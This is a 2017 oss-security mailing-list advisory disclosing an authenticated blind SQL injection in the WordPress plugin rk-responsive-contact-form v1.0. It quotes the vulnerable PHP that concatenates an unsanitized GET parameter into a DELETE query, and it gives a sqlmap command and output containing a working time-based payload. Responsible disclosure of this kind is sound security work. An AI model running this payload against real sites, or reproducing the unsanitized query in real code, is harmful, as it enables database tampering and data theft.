Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [day] [month] [year] [list]
Message-id: <CEF95F5A-B021-4514-867B-64B38D7CFBF3@me.com>
Date: Wed, 23 Aug 2017 08:22:07 -0400
From: "Larry W. Cashdollar" <larry0@...com>
To: Open Source Security <oss-security@...ts.openwall.com>
Subject: Authenticated Blind SQL Injection vulnerability in Wordpress plugin
 rk-responsive-contact-form v1.0

Title: Authenticated Blind SQL Injection vulnerability in Wordpress plugin rk-responsive-contact-form v1.0
Author: Larry W. Cashdollar, @_larry0
Date: 2017-07-01
CVE-ID:[CVE-2017-1002027]
Download Site: https://wordpress.org/plugins/rk-responsive-contact-form/
Vendor: rkdevelopers
Vendor Notified: 2017-08-05
Vendor Contact: plugins@...dpress.org
Advisory: http://www.vapidlabs.com/advisory.php?v=198
Description: A simple WordPress plugin that generates a responsive contact form on your website or blog
Vulnerability:
The variable $delid isn't sanitized before being passed into an SQL query in file ./rk-responsive-contact-form/include/rk_user_list.php :

1-<?php 
2-	global $wpdb;
3-	$table_name = $wpdb->prefix . "rk_contact";
4:	$info=$_GET["info"];
5-	if($info=="del")
6-	{
7:	$delid=$_GET["did"];
8-	
9-	$wpdb->query("delete from ".$table_name." where `user_id`=".$delid);
10-	echo "<div style='clear:both;'></div><div class='updated' id='message'><p><strong>:".__('User Record Deleted.','rkcontactform')."</strong>.</p></div>";
11-	}
12-?>

The attacker must have permission to modify contacts in order to exploit this vulnerability.

Exploit Code:
	• $ sqlmap -u 'http://example.com/wp-admin/admin.php?page=rk_user_lists&info=del&did=*' --load-cookies=./cookie.txt --level=2 --risk=1 --dbms=mysql 
	•  
	•  
	• URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
	• sqlmap identified the following injection point(s) with a total of 318 HTTP(s) requests:
	• ---
	• Parameter: #1* (URI)
	•   Type: AND/OR time-based blind
	•   Title: MySQL >= 5.0.12 time-based blind - Parameter replace
	•   Payload: http://example.com:80/wp-admin/admin.php?page=rk_user_lists&info=del&did=(CASE WHEN (6363=6363) THEN SLEEP(5) ELSE 6363 END)
	• ---
	• [10:57:22] [INFO] the back-end DBMS is MySQL
	• web server operating system: Linux Ubuntu 16.04 (xenial)
	• web application technology: Apache 2.4.18
	• back-end DBMS: MySQL >= 5.0.12
	• [10:57:22] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'
	•  
	• [*] shutting down at 10:57:22

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.